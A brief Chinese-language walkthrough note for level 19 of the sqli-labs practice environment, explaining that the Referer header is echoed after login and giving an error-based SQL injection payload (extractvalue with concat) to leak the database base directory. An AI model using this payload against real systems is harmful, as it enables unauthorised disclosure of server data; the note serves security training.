sqli labs-19

1、和sqli labs-18 一样，当登陆成功后会显示出referer的值。所以直接抓包改变referer的值 1′ and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and ‘1’=’1 直接爆出路径